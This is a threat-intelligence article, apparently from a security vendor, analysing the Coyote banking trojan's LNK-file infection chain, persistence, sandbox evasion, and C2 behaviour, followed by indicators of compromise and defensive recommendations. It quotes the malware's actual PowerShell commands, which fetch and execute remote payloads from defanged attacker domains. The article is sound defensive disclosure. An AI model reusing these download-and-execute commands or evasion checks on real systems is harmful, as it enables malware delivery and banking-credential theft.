How Coyote Banking Malware Uses LNK Files to Attack 1,000+ Websites and 70+ Banks

A very sophisticated malware attack, currently making waves in the information security community, was recently discovered by FortiGuard Labs. This attack targets Windows computer users in Brazil and is part of a campaign delivering malicious banking software called Coyote. The attack campaign uses LNK files containing PowerShell commands designed to execute malicious scripts and connect to remote servers. Once executed, this malware can perform actions like taking screenshots, displaying phishing overlays to steal sensitive credentials, and keylogging.

The attack process

According to research by FortiGuard Labs, first, the LNK shortcut file with suspicious parameters in the "Target" field will execute and run a PowerShell command to connect to a remote server. The command is as follows:

-w hid -noni -ep Bypass -c “Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri ‘hxxps://tbet[.]geontrigame[.]com/zxchzzmism’ -UseBasicParsing).Content }; Start-Sleep 131.”

After execution, the victim will connect to the remote server (tbet.geontrigame[.]com) and then download additional payloads and execute them for the attack. Researchers have analyzed different LNK files and discovered various URLs in the parameter:

The content in the downloaded PowerShell script contains 2 encoded data segments as follows:

After being decoded, the code will be injected into memory using Windows API functions like VirtualAllocEx and WriteProcessMemory. This process is carried out by a DLL loader (bmwiMcDec) to inject the payload npuGDec.

After that, the malware will create persistence by modifying the Windows Registry at “HCKU\Software\Microsoft\Windows\CurrentVersion\Run“. First, it will check if there is any PowerShell command in this entry; if there is, it will delete it and create a new entry with a random name. This entry contains a PowerShell command to download and execute a Base64-encoded URL that contains the main functions of the Coyote malware. The URL, once decoded, is:

hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw

If it's a new target, the malware will collect information about the machine, such as the device name, username, and operating system details, and send it to the attacker's server. It will also search for antivirus programs installed on the machine by querying the SecurityCenter2 namespace in Windows Management Instrumentation (WMI). The information will then be separated by the "|" symbol, encoded in Base64, and reversed. This string will then be added as a parameter and sent to the remote control server, as shown in the following example URL:

hxxps://yezh[.]geontrigame[.]com/hqizjs/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzlmcoNEf0IDR0Ul(omit)

After setting up and checking, the malware will call CreateProcess to execute the PowerShell command just added to the Registry to call the following payload:

powershell -w hid -noni -ep Bypass -c “$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly95ZXpoLmdlb250cmlnYW1lLmNvbS92eGV3aGNhY2JmcW5zdw=='));IEX $w.DownloadString($u).”

This payload is similar to the payload downloaded from the LNK file but is larger because it contains the main part of the Coyote malware.

After decoding, the payload above has the following functions:

• Check the username. If the username is a test or sandbox name like Johnson, Miller, maltest, Sandbox, John Doe, etc.

• Check the environment for folders related to virtual machines. It will look for strings in “C:\Windows\System32“ that contain qemu-ga, qemuwmi, balloon.sys, netkvm.sys, vioinput, viofs.sys, and vioser.sys.

• Build a target list: The Coyote malware expands the target list to include 1,030 websites and 73 financial enterprises.

• Connect to the C2 server: Coyote will continue to monitor active devices to detect if the victim connects to the targets. If there is a connection to the target, it will send information to the C2 server through port 443. The server includes: eraatualiza[.]com, masterdow[.]com, and geraupdate[.]com. Depending on the information returned from the C2 server, the malware will perform actions such as viewing, taking screenshots, clicking the mouse, executing a keylogger, shutting down the device, etc.

The attack chain of the Coyote malware is as follows:

IOC

1. URL

   • hxxps://btee[.]geontrigame[.]com/mvkrouhawm

   • jxxps://qmnw[.]daowsistem[.]com/fayikyeund

   • hxxps://bhju[.]daowsistem[.]com/iwywybzqxk

   • hxxps://lgfd[.]daowsistem[.]com/riqojhyvnr

   • hxxps://leme[.]daowsistem[.]com/omzowcicwp

   • hxxps://igow[.]scortma[.]com/fqieghffbm

   • hxxps://quit[.]scortma[.]com/xzcpnnfhxi

   • hxxps://llue[.]geontrigame[.]com/byyyfydxyf

   • hxxps://cxmp[.]scortma[.]com/qfutdbtqqu

   • hxxps://xrxw[.]scortma[.]com/gmdroacyvi

   • hxxps://qfab[.]geontrigame[.]com/vfofnzihsm

   • hxxps://tbet[.]geontrigame[.]com/zxchzzmism

   • hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw

2. Host

   • geraatualiza[.]com

   • masterdow[.]com

   • geraupdate[.]com

3. File SHA-256 hash

   • 362af8118f437f9139556c59437544ae1489376dc4118027c24c8d5ce4d84e48

   • 330dffe834ebbe4042747bbe00b4575629ba8f2507bccf746763cacf63d655bb

   • 33cba89eeeaf139a798b7fa07ff6919dd0c4c6cf4106b659e4e56f15b5809287

   • 552d53f473096c55a3937c8512a06863133a97c3478ad6b1535e1976d1e0d45f

   • 64209e2348e6d503ee518459d0487d636639fa5e5298d28093a5ad41390ef6b0

   • 67f371a683b2be4c8002f89492cd29d96dceabdbfd36641a27be761ee64605b1

   • 73ad6be67691b65cee251d098f2541eef3cab2853ad509dac72d8eff5bd85bc0

   • 7cbfbce482071c6df823f09d83c6868d0b1208e8ceb70147b64c52bb8b48bdb8

   • 839de445f714a32f36670b590eba7fc68b1115b885ac8d689d7b344189521012

   • bea4f753707eba4088e8a51818d9de8e9ad0138495338402f05c5c7a800695a6

   • f3c37b1de5983b30b9ae70c525f97727a56d3874533db1a6e3dc1355bfbf37ec

   • fd0ef425d34b56d0bc08bd93e6ecb11541bd834b9d4d417187373b17055c862e

Recommendation

With complex and sophisticated attack methods, FPT Threat Intelligence has the following recommendations:

• Regularly update antivirus software to detect and block the latest malware

• Update IOCs related to malware

• Do not open strange or suspicious files

• Implement monitoring measures to detect unusual activities and behaviors on endpoints, such as EDR, XDR, etc.

Reference

1. Coyote Banking Trojan: A Stealthy Attack via LNK Files | FortiGuard Labs

2. Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

3. Coyote Banking Malware Weaponizing Windows LNK Files To Execute Malicious Scripts